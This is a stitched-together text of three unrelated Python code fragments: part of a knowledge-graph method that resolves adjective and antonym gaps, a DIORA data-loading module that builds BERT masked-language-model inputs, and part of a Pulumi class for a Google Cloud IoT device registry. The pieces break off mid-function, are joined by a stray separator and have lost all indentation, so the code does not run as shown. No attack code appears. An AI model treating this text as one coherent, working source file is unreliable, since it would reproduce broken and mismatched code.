if CONTROL_IDENTIFY_NEGATION is True:
antonymNodes = self.ListOfNodesWithValueFromList(antonymList)
newNymCount = 0
if CONTROL_IDENTIFY_LEXICAL is True:
if len(adjectiveNodes) < 1:
openGap = True
print("Lexical gap encountered - an adjective (" + propAdjective + ") was introduced which is not"
" currently in the system's vocabulary.")
if CONTROL_RESOLVE_LEXICAL is True:
# TODO: Allow user to manually choose yes/no to resolve?
# Should antonymNodes be counted here too?
while len(adjectiveNodes) < 1 and len(antonymNodes) < 1 and newNymCount < 3:
# No nodes "active"
newAdjective = requestNewTermToNymCheck(propAdjective)
newNymCount = newNymCount + 1
adjectiveNymList, newAntonymList = getNyms(newAdjective)
antonymNodes = self.ListOfNodesWithValueFromList(newAntonymList)
adjectiveNodes = self.ListOfNodesWithValueFromList(adjectiveNymList)
if len(adjectiveNodes) > 0:
print("Lexical gap resolved - an adjective given (" + newAdjective + ") was found in the"
" knowledge base")
if len(adjectiveNodes) > 0:
for node in adjectiveNodes:
# Add new term into adjective node in order to grow our vocabulary
if propAdjective not in self.DRSGraph.graph.node[node][CONST_NODE_VALUE_KEY]:
# TODO: SEE IF I CAN CHANGE THIS TO NOT USE THIS FUNCTION
self.DRSGraph.AppendValueAtSpecificNode(node, propAdjective)
propertyNode = self.getPropertyNodeFromAdjective(node)
self.nodesWithGivenProperty.append(propertyNode)
# MAP FOUND PROPERTY NODE'S REF ID TO THE INCOMING REF ID
if self.DRSGraph.graph.has_node(propertyNode):
DRSNodeRefID = self.DRSGraph.graph.node[propertyNode][CONST_NODE_VALUE_KEY]
self.newToOldRefIDMapping.update({propRefId: DRSNodeRefID})
self.propertyCount = self.propertyCount + 1
openGap = False
if CONTROL_IDENTIFY_NEGATION is True:
if len(antonymNodes) > 0:
print("Negation gap identified - a node has been found that contains an antonym of one of the "
"provided adjectives")
# propertyNodesWithAdjective = []
if CONTROL_RESOLVE_NEGATION is True:
for node in antonymNodes:
# print("AntonymNode", node)
propertyNode = self.getPropertyNodeFromAdjective(node)
self.nodesWithGivenPropertyAntonym.append(propertyNode)
print("Negation gap resolved - an antonym has been found in the knowledge graph")
# MAP FOUND ANTONYM NODE'S REF ID TO THE INCOMING REF ID
if self.DRSGraph.graph.has_node(propertyNode):
DRSNodeRefID = self.DRSGraph.graph.node[propertyNode][CONST_NODE_VALUE_KEY]
self.newToOldRefIDMapping.update({propRefId: DRSNodeRefID})
self.propertyCount = self.propertyCount + 1
self.negationActive = True
openGap = False
# If no adjective or antonym node was found, make sure the reference ID gets removed
if (len(adjectiveNodes) == 0 and len(antonymNodes) == 0) or openGap is True:
self.newToOldRefIDMapping.update({propRefId: None})
self.propertyCount = self.propertyCount + 1
# ***********************************************************************************************************************************
# If no adjective nodes are found, then we look for antonyms
# Because of this, we are positive-biased, as if we find adjective nodes, we don't look for antonyms
# It may be a better approach to look for both and, if both are found,
# declare a conflict rather than assume one way or the other -
# at the cost of slower processing.
# ***********************************************************************************************************************************
# else:
# antonymNodes = self.ListOfNodesWithValueFromList(antonymList)
# We don't want to grow the vocabulary here directly, so we skip the adding new terms
# if (len(antonymNodes) > 0):
# propertyNodesWithAdjective = []
# for node in antonymNodes:
# print("AntonymNode", node)
# if(propAdjective not in self.DRSGraph.graph.node[node]['value']):
# self.DRSGraph.AppendValueAtSpecificNode(node, propAdjective)
# propertyNode = self.getPropertyNodeFromAdjective(node)
# #print("propertyNode", propertyNode)
# self.nodesWithGivenPropertyAntonym.append(propertyNode)
# For predicate() predicates
# HOW TO HANDLE SENTENCE SUBORDINATION?
def question_predicate(self, predicateContents):
# Intransitive verbs: (predName, verb, subjectRef)
# - The SubjectRef Verbed (the man laughed, the target appears)
# Transitive verbs: (predName, verb, subjectRef, dirObjRef)
# - The Subjectref Verbed the dirObjRef (the task A has a group of objects H,
# the subject L remembers the letter I)
# Ditransitive verbs: (predName, verb, subjRef, dirObjRef, indirObjRef)
# - The SubjectRef verbed the DirObjRef to the indirObjRef (The professor (S) gave
# | |
from collections import deque
import torch
import pickle
import numpy as np
from tqdm import tqdm
from diora.data.reading import NLIReader, PlainTextReader, ConllReader, JSONLReader, PartItTextReader, PartItWholeTextReader
from diora.data.batch_iterator import BatchIterator
from diora.data.bert_batch_iterator import BERTBatchIterator
from diora.data.embeddings import EmbeddingsReader, UNK_TOKEN
from diora.data.preprocessing import indexify, build_text_vocab
from diora.data.preprocessing import synthesize_training_data
from diora.logging.configuration import get_logger
from diora.blocks.negative_sampler import NegativeSampler, calculate_freq_dist
# MAX_SUBTKS = 50
class Vocabulary(object):
def __init__(self):
self.word2idx = {}
self.idx2word = {}
self.idx = 0
def add_word(self, word):
if word not in self.word2idx:
self.word2idx[word] = self.idx
self.idx2word[self.idx] = word
self.idx += 1
def __call__(self, word):
if word not in self.word2idx:
return self.word2idx['<unk>']
return self.word2idx[word]
def __len__(self):
return len(self.word2idx)
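# A minimal usage sketch (hypothetical; nothing in this module calls it).
# Note that '<unk>' must be added first so __call__ can fall back to it
# for out-of-vocabulary words.
def _demo_vocabulary():
    vocab = Vocabulary()
    vocab.add_word('<unk>')
    for w in ['the', 'target', 'appears']:
        vocab.add_word(w)
    assert vocab('target') == 2
    assert vocab('missing') == vocab('<unk>') == 0
    return len(vocab)  # 4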
class ConsolidateDatasets(object):
"""
A class for consolidating many datasets.
"""
def __init__(self, datasets):
# a list of dataset
self.datasets = datasets
def reindex(self, sentences, inverse_mapping):
def fn(s):
for idx in s:
yield inverse_mapping[idx]
def queue(lst):
q = deque(lst)
while len(q) > 0:
yield q.popleft()
return [list(fn(s)) for s in tqdm(queue(sentences), desc='reindex')]
def remap_embeddings(self, datasets, inverse_mapping_lst, master_word2idx):
size = datasets[0]['embeddings'].shape[1]
embeddings = np.zeros((len(master_word2idx), size), dtype=np.float32)
for dset, old2master in zip(datasets, inverse_mapping_lst):
idx_from, idx_to = zip(*old2master.items())
embeddings[np.asarray(idx_to)] = dset['embeddings'][np.asarray(idx_from)]
return embeddings
def consolidate_word2idx(self, word2idx_lst):
master_word2idx = {}
inverse_mapping_lst = []
for w2i in word2idx_lst:
old2master = {}
for w, idx in w2i.items():
if w not in master_word2idx:
master_word2idx[w] = len(master_word2idx)
old2master[idx] = master_word2idx[w]
inverse_mapping_lst.append(old2master)
return master_word2idx, inverse_mapping_lst
def run(self):
# combine shared information across the datasets, such as word2idx
word2idx_lst = [x['word2idx'] for x in self.datasets]
master_word2idx, inverse_mapping_lst = self.consolidate_word2idx(word2idx_lst)
embeddings = self.remap_embeddings(self.datasets, inverse_mapping_lst, master_word2idx)
for dset, inverse_mapping in zip(self.datasets, inverse_mapping_lst):
dset['sentences'] = self.reindex(dset['sentences'], inverse_mapping)
dset['word2idx'] = master_word2idx
dset['embeddings'] = embeddings
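# A hypothetical sketch of consolidate_word2idx on two tiny vocabularies
# (the words and indexes are illustrative only): shared words collapse to a
# single master index, with per-dataset remappings returned alongside.
def _demo_consolidate_word2idx():
    cd = ConsolidateDatasets(datasets=[])
    master, inv = cd.consolidate_word2idx(
        [{'cat': 0, 'dog': 1}, {'dog': 0, 'fox': 1}])
    assert master == {'cat': 0, 'dog': 1, 'fox': 2}
    assert inv == [{0: 0, 1: 1}, {0: 1, 1: 2}]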
class ReaderManager(object):
def __init__(self, reader):
super(ReaderManager, self).__init__()
self.reader = reader
self.logger = get_logger()
def run(self, options, text_path, embeddings_path):
reader = self.reader
logger = self.logger
logger.info('Reading text: {}'.format(text_path))
reader_result = reader.read(text_path)
sentences = reader_result['sentences']
# print('the first sent: ', sentences[0])
# print('len: ', len(sentences))
extra = reader_result['extra']
# print('len extra: ', len(extra))
metadata = reader_result.get('metadata', {})
logger.info('len(sentences)={}'.format(len(sentences)))
if options.word2idx is not None:
# load the word2idx
with open(options.word2idx, 'rb') as r:
word2idx = pickle.load(r)
word2idx = word2idx.word2idx
else:
word2idx = build_text_vocab(sentences)
logger.info('len(vocab)={}'.format(len(word2idx)))
embeddings = None
if options.emb != 'bert':
if 'embeddings' in metadata:
logger.info('Using embeddings from metadata.')
embeddings = metadata['embeddings']
del metadata['embeddings']
else:
logger.info('Reading embeddings.')
embeddings, word2idx = EmbeddingsReader().get_embeddings(
options, embeddings_path, word2idx)
# idx2word = {v:k for k, v in word2idx.items()}
# print('unk tk: ', word2idx['<unk>'])
# print('unk idx: ', idx2word[0])
unk_index = word2idx.get(UNK_TOKEN, 0)
logger.info('Converting tokens to indexes (unk_index={}).'.format(unk_index))
sentences = indexify(sentences, word2idx, unk_index)
return {
"sentences": sentences,
"embeddings": embeddings,
"word2idx": word2idx,
"extra": extra,
"metadata": metadata,
}
class ReconstructDataset(object):
def initialize(self, options, text_path=None, embeddings_path=None, filter_length=0, data_type=None):
if data_type == 'nli':
reader = NLIReader.build(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'conll_jsonl':
reader = ConllReader(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'txt':
reader = PlainTextReader(lowercase=options.lowercase, filter_length=filter_length, include_id=False)
elif data_type == 'txt_id':
reader = PlainTextReader(lowercase=options.lowercase, filter_length=filter_length, include_id=True)
elif data_type == 'jsonl':
reader = JSONLReader(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'synthetic':
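# NOTE: SyntheticReader is assumed to be in scope here; it is not imported at the top of this module.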
reader = SyntheticReader(nexamples=options.synthetic_nexamples,
embedding_size=options.synthetic_embeddingsize,
vocab_size=options.synthetic_vocabsize, seed=options.synthetic_seed,
minlen=options.synthetic_minlen, maxlen=options.synthetic_maxlen,
length=options.synthetic_length)
elif data_type == 'partit':
reader = PartItTextReader(lowercase=options.lowercase, filter_length=filter_length)
elif data_type == 'partitwhole':
reader = PartItWholeTextReader(lowercase=options.lowercase, filter_length=filter_length)
else:
raise ValueError('Unknown data_type: {}'.format(data_type))
manager = ReaderManager(reader)
result = manager.run(options, text_path, embeddings_path)
return result
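# Hypothetical call (paths are illustrative; `options` is the parsed
# command-line namespace used throughout this module):
#
#     result = ReconstructDataset().initialize(
#         options, text_path='train.txt', embeddings_path='glove.txt',
#         filter_length=40, data_type='txt')
#     sentences, word2idx = result['sentences'], result['word2idx']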
def generate_inputs_subwords(sent, tokenizer, mask=True):
# check the overall length first
len_sent = len(sent)
sent_join = ' '.join(sent)
inputs = tokenizer(sent_join, return_tensors='pt')
inputs['labels'] = inputs.input_ids.detach().clone()
tks_len = len(inputs.input_ids[0].tolist())
tokens = []
tokens_mask = []
start_pos = 1
end_pos = start_pos
for word in sent:
word_tokens = tokenizer.tokenize(word)
tk_len = len(word_tokens)
end_pos = start_pos + tk_len
tk_mask = [0. for _ in range(tks_len)]
tk_mask[start_pos:end_pos] = [1./tk_len for _ in range(tk_len)]
start_pos = end_pos
tokens_mask.append(tk_mask)
assert end_pos == tks_len-1, 'Sub-token spans should end just before the final [SEP] token.'
# print('len(tokens_mask): ', len(tokens_mask))
# padding the mask
padding_num = tks_len - 2 - len(tokens_mask)
# # print('padding_num: ', padding_num)
assert padding_num >= 0, 'The number of word masks should not exceed the number of sub-tokens (excluding [CLS]/[SEP]).'
for i in range(padding_num):
tokens_mask.append([0. for _ in range (tks_len)])
inputs['token_mask'] = torch.FloatTensor(tokens_mask)
# get the labels
inputs['labels'] = inputs.input_ids.detach().clone()
if mask:
# generate the mask
rand = torch.rand(inputs.input_ids.shape)
mask_arr = (rand < 0.15) * (inputs.input_ids != 101) * (inputs.input_ids != 102)
selection = torch.flatten((mask_arr[0].nonzero())).tolist()
inputs.input_ids[0, selection] = 103
# positions that were NOT masked keep the ignore label (-100)
no_mask = set(range(len(inputs.input_ids[0]))) - set(selection)
inputs['labels'][0, list(no_mask)] = -100
return inputs
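# A toy sketch (hypothetical; numbers are illustrative) of what the per-word
# token_mask built above does: row w averages the sub-token vectors that
# belong to word w, so mask @ hidden yields one vector per original word.
def _demo_token_mask():
    tks_len = 6  # [CLS] a b1 b2 c [SEP]
    tokens_mask = [
        [0., 1., 0., 0., 0., 0.],   # word 'a' -> sub-token 1
        [0., 0., .5, .5, 0., 0.],   # word 'b' -> mean of sub-tokens 2, 3
        [0., 0., 0., 0., 1., 0.],   # word 'c' -> sub-token 4
    ]
    mask = torch.FloatTensor(tokens_mask)
    hidden = torch.arange(tks_len, dtype=torch.float32).unsqueeze(1)  # (6, 1)
    return mask @ hidden  # tensor([[1.], [2.5], [4.]])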
def generate_inputs(sent, tokenizer):
len_sent = len(sent)
sent_join = ' '.join(sent)
inputs = tokenizer(sent_join, return_tensors='pt')
inputs['labels'] = inputs.input_ids.detach().clone()
# generate the mask
rand = torch.rand(inputs.input_ids.shape)
mask_arr = (rand < 0.15) * (inputs.input_ids != 101) * (inputs.input_ids != 102)
selection = torch.flatten((mask_arr[0]).nonzero()).tolist()
inputs.input_ids[0, selection] = 103
# positions that were NOT masked keep the ignore label (-100)
no_mask = set(range(len(inputs.input_ids[0]))) - set(selection)
inputs['labels'][0, list(no_mask)] = -100
# x = sent
# y = tokenizer.convert_ids_to_tokens(inputs['input_ids'][0].tolist())
# if len(x) != len(y):
# print(sent_join)
# print(x)
# print(y)
# assert len(sent) == len(inputs['labels']), 'All tokens should be inside'
return inputs
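# A minimal standalone sketch of the masking rule above (assumes BERT-style
# special ids: 101 = [CLS], 102 = [SEP], 103 = [MASK]): roughly 15% of
# non-special tokens are replaced by [MASK], and labels keep the original id
# only at masked positions (-100 everywhere else is ignored by the loss).
def _demo_mlm_mask():
    input_ids = torch.tensor([[101, 2023, 2003, 1037, 3231, 102]])
    labels = input_ids.detach().clone()
    rand = torch.rand(input_ids.shape)
    mask_arr = (rand < 0.15) * (input_ids != 101) * (input_ids != 102)
    selection = torch.flatten(mask_arr[0].nonzero()).tolist()
    input_ids[0, selection] = 103
    no_mask = set(range(input_ids.shape[1])) - set(selection)
    labels[0, list(no_mask)] = -100
    return input_ids, labels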
def generate_inputs_worigin(sent, tokenizer, sent_tks, mask=True):
# check the overall length
word_len = len(sent_tks)
assume_word_len = word_len + 14
len_sent = len(sent)
sent_join = ' '.join(sent)
inputs = tokenizer(sent_join, return_tensors='pt')
inputs['labels'] = inputs.input_ids.detach().clone()
tks_len = len(inputs.input_ids[0].tolist())
assert tks_len <= assume_word_len, 'The assumed word length {} is shorter than Bert tks_len {}, sent: {}'.format(assume_word_len, tks_len, sent_join)
addition_tks_len = assume_word_len - tks_len
tokens = []
tokens_mask = []
start_pos = 1
end_pos = start_pos
for word in sent:
word_tokens = tokenizer.tokenize(word)
tk_len = len(word_tokens)
end_pos = start_pos + tk_len
tk_mask = [0. for _ in range(assume_word_len)]
tk_mask[start_pos:end_pos] = [1./tk_len for _ in range(tk_len)]
start_pos = end_pos
tokens_mask.append(tk_mask)
assert end_pos == tks_len-1, 'Sub-token spans should end just before the final [SEP] token.'
# origin_len x input_tk_len
inputs['token_mask'] = torch.FloatTensor(tokens_mask)
if mask:
# generate the mask
rand = torch.rand(inputs.input_ids.shape)
mask_arr = (rand < 0.15) * (inputs.input_ids != 101) * (inputs.input_ids != 102)
selection = torch.flatten((mask_arr[0].nonzero())).tolist()
inputs.input_ids[0, selection] = 103
no_mask = set(range(len(inputs.input_ids[0]))) - set(selection)
inputs['labels'][0, list(no_mask)] = -100
# pad every tensor out to the assumed word length
inputs['input_ids'] = torch.LongTensor(inputs['input_ids'][0].tolist() + [0 for _ in range(addition_tks_len)]).unsqueeze(0)
inputs['token_type_ids'] = torch.LongTensor(inputs['token_type_ids'][0].tolist() + [0 for _ in range(addition_tks_len)]).unsqueeze(0)
inputs['attention_mask'] = torch.LongTensor(inputs['attention_mask'][0].tolist() + [0 for _ in range(addition_tks_len)]).unsqueeze(0)
inputs['labels'] = torch.LongTensor(inputs['labels'][0].tolist() + [-100 for _ in range(addition_tks_len)]).unsqueeze(0)
# add seq
inputs['origin_input_ids'] = torch.LongTensor(sent_tks).unsqueeze(0)
inputs['sents'] = sent
return inputs
class MLMDataset(object):
def initialize(self, options, tokenizer, model, text_path, filter_length):
if options.data_type == 'partitwhole':
reader = PartItWholeTextReader(lowercase=options.lowercase, filter_length=filter_length)
elif options.data_type == 'partit':
reader = PartItTextReader(lowercase=options.lowercase, filter_length=filter_length)
else:
raise Exception("Bert only for partitwhole datatype.")
# {'sentence': [list of string]}
reader_result = reader.read(text_path)
sentences = reader_result['sentences']
extra = reader_result['extra']
metadata = reader_result.get('metadata', {})
# read the wordidx
if options.word2idx is not None:
# load the word2idx
with open(options.word2idx, 'rb') as r:
word2idx = pickle.load(r)
word2idx = word2idx.word2idx
# check all words in word2idx
word_set = set([x for l in sentences for x in l])
print('There are {} OOV words'.format(len(word_set - set(word2idx.keys()))))
# check the new words outside the tokenizer and put them in
tokenizer_vocab = tokenizer.vocab
new_vocab = []
vocab_add_cnt = 0
for word in list(word_set):
if word not in tokenizer_vocab:
print(word)
new_vocab.append(word)
vocab_add_cnt += 1
print('Number of tokens added to the tokenizer: {}'.format(vocab_add_cnt))
if len(new_vocab) != 0:
tokenizer.add_tokens(new_vocab)
# add new words to model
model.resize_token_embeddings(len(tokenizer))
# generate
dataset = [
generate_inputs(sen, tokenizer) for sen in sentences
]
return {
'sentences': dataset,
'word2idx': word2idx,
'extra': extra,
'metadata': metadata,
}
class BERTDataset(object):
def initialize(self, options, tokenizer, model, text_path, filter_length):
if options.data_type == 'partitwhole':
reader = PartItWholeTextReader(lowercase=options.lowercase, filter_length=filter_length)
elif options.data_type == 'partit':
reader = PartItTextReader(lowercase=options.lowercase, filter_length=filter_length)
else:
raise Exception("Bert only for partitwhole datatype.")
# {'sentence': [list of string]}
reader_result = reader.read(text_path)
sentences = reader_result['sentences']
extra = reader_result['extra']
metadata = reader_result.get('metadata', {})
# read the wordidx
if options.word2idx is not None:
# load the word2idx
with open(options.word2idx, 'rb') as r:
word2idx = pickle.load(r)
word2idx = word2idx.word2idx
# check all words in word2idx
word_set = set([x for l in sentences for x in l])
print('There are {} OOV words'.format(len(word_set - set(word2idx.keys()))))
# generate
dataset = [
generate_inputs_subwords(sent, tokenizer, options.mask) for sent in sentences
]
return {
'sentences': dataset,
'word2idx': word2idx,
'extra': extra,
'metadata': metadata,
}
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which the created registry should reside.
If it is not provided, the provider region is used.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="stateNotificationConfig")
def state_notification_config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
A PubSub topic to publish device state updates.
The structure is documented below.
"""
return pulumi.get(self, "state_notification_config")
@state_notification_config.setter
def state_notification_config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "state_notification_config", value)
class Registry(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]]] = None,
event_notification_configs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]]] = None,
http_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
log_level: Optional[pulumi.Input[str]] = None,
mqtt_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
state_notification_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
"""
A Google Cloud IoT Core device registry.
To get more information about DeviceRegistry, see:
* [API documentation](https://cloud.google.com/iot/docs/reference/cloudiot/rest/)
* How-to Guides
* [Official Documentation](https://cloud.google.com/iot/docs/)
## Example Usage
### Cloudiot Device Registry Basic
```python
import pulumi
import pulumi_gcp as gcp
test_registry = gcp.iot.Registry("test-registry")
```
### Cloudiot Device Registry Single Event Notification Configs
```python
import pulumi
import pulumi_gcp as gcp
default_telemetry = gcp.pubsub.Topic("default-telemetry")
test_registry = gcp.iot.Registry("test-registry", event_notification_configs=[gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
)])
```
### Cloudiot Device Registry Full
```python
import pulumi
import pulumi_gcp as gcp
default_devicestatus = gcp.pubsub.Topic("default-devicestatus")
default_telemetry = gcp.pubsub.Topic("default-telemetry")
additional_telemetry = gcp.pubsub.Topic("additional-telemetry")
test_registry = gcp.iot.Registry("test-registry",
event_notification_configs=[
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=additional_telemetry.id,
subfolder_matches="test/path",
),
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
),
],
state_notification_config={
"pubsub_topic_name": default_devicestatus.id,
},
mqtt_config={
"mqtt_enabled_state": "MQTT_ENABLED",
},
http_config={
"http_enabled_state": "HTTP_ENABLED",
},
log_level="INFO",
credentials=[gcp.iot.RegistryCredentialArgs(
public_key_certificate={
"format": "X509_CERTIFICATE_PEM",
"certificate": (lambda path: open(path).read())("test-fixtures/rsa_cert.pem"),
},
)])
```
## Import
DeviceRegistry can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/locations/{{region}}/registries/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]] credentials: List of public key certificates to authenticate devices.
The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]] event_notification_configs: List of configurations for event notifications, such as PubSub topics
to publish device events to.
Structure is documented below.
:param pulumi.Input[Mapping[str, Any]] http_config: Activate or deactivate HTTP.
The structure is documented below.
:param pulumi.Input[str] log_level: The default logging verbosity for activity from devices in this
registry. Specifies which events should be written to logs. For
example, if the LogLevel is ERROR, only events that terminate in
errors will be logged. LogLevel is inclusive; enabling INFO logging
will also enable ERROR logging.
Default value is `NONE`.
Possible values are `NONE`, `ERROR`, `INFO`, and `DEBUG`.
:param pulumi.Input[Mapping[str, Any]] mqtt_config: Activate or deactivate MQTT.
The structure is documented below.
:param pulumi.Input[str] name: A unique name for the resource, required by device registry.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The region in which the created registry should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[Mapping[str, Any]] state_notification_config: A PubSub topic to publish device state updates.
The structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[RegistryArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Google Cloud IoT Core device registry.
To get more information about DeviceRegistry, see:
* [API documentation](https://cloud.google.com/iot/docs/reference/cloudiot/rest/)
* How-to Guides
* [Official Documentation](https://cloud.google.com/iot/docs/)
## Example Usage
### Cloudiot Device Registry Basic
```python
import pulumi
import pulumi_gcp as gcp
test_registry = gcp.iot.Registry("test-registry")
```
### Cloudiot Device Registry Single Event Notification Configs
```python
import pulumi
import pulumi_gcp as gcp
default_telemetry = gcp.pubsub.Topic("default-telemetry")
test_registry = gcp.iot.Registry("test-registry", event_notification_configs=[gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
)])
```
### Cloudiot Device Registry Full
```python
import pulumi
import pulumi_gcp as gcp
default_devicestatus = gcp.pubsub.Topic("default-devicestatus")
default_telemetry = gcp.pubsub.Topic("default-telemetry")
additional_telemetry = gcp.pubsub.Topic("additional-telemetry")
test_registry = gcp.iot.Registry("test-registry",
event_notification_configs=[
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=additional_telemetry.id,
subfolder_matches="test/path",
),
gcp.iot.RegistryEventNotificationConfigItemArgs(
pubsub_topic_name=default_telemetry.id,
subfolder_matches="",
),
],
state_notification_config={
"pubsub_topic_name": default_devicestatus.id,
},
mqtt_config={
"mqtt_enabled_state": "MQTT_ENABLED",
},
http_config={
"http_enabled_state": "HTTP_ENABLED",
},
log_level="INFO",
credentials=[gcp.iot.RegistryCredentialArgs(
public_key_certificate={
"format": "X509_CERTIFICATE_PEM",
"certificate": (lambda path: open(path).read())("test-fixtures/rsa_cert.pem"),
},
)])
```
## Import
DeviceRegistry can be imported using any of these accepted formats
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/locations/{{region}}/registries/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:iot/registry:Registry default {{name}}
```
:param str resource_name: The name of the resource.
:param RegistryArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RegistryArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]]] = None,
event_notification_configs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]]] = None,
http_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
log_level: Optional[pulumi.Input[str]] = None,
mqtt_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
state_notification_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RegistryArgs.__new__(RegistryArgs)
__props__.__dict__["credentials"] = credentials
__props__.__dict__["event_notification_configs"] = event_notification_configs
__props__.__dict__["http_config"] = http_config
__props__.__dict__["log_level"] = log_level
__props__.__dict__["mqtt_config"] = mqtt_config
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
__props__.__dict__["state_notification_config"] = state_notification_config
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="gcp:kms/registry:Registry")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Registry, __self__).__init__(
'gcp:iot/registry:Registry',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
credentials: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]]] = None,
event_notification_configs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]]] = None,
http_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
log_level: Optional[pulumi.Input[str]] = None,
mqtt_config: Optional[pulumi.Input[Mapping[str, Any]]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
state_notification_config: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Registry':
"""
Get an existing Registry resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryCredentialArgs']]]] credentials: List of public key certificates to authenticate devices.
The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RegistryEventNotificationConfigItemArgs']]]] event_notification_configs: List of configurations for event notifications, such as PubSub topics
to publish device events to.
Structure is documented below.
:param pulumi.Input[Mapping[str, Any]] http_config: Activate or deactivate HTTP.
The structure is documented below.
:param pulumi.Input[str] log_level: The default logging verbosity for activity from devices in this
registry. Specifies which events should be written to logs. For
example, if the LogLevel is ERROR, only events that terminate in
errors will be logged. LogLevel is inclusive; enabling INFO logging
will also enable ERROR logging.
Default value is `NONE`.
Possible values are `NONE`, `ERROR`, `INFO`, and `DEBUG`.
:param pulumi.Input[Mapping[str, Any]] mqtt_config: Activate or deactivate MQTT.
The structure is documented below.
:param pulumi.Input[str] name: A unique name for the resource, required by device registry.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: The region in which the created registry should reside.
If it is not provided, the provider region is used.
:param pulumi.Input[Mapping[str, Any]] state_notification_config: A PubSub topic to publish device state updates.
The structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
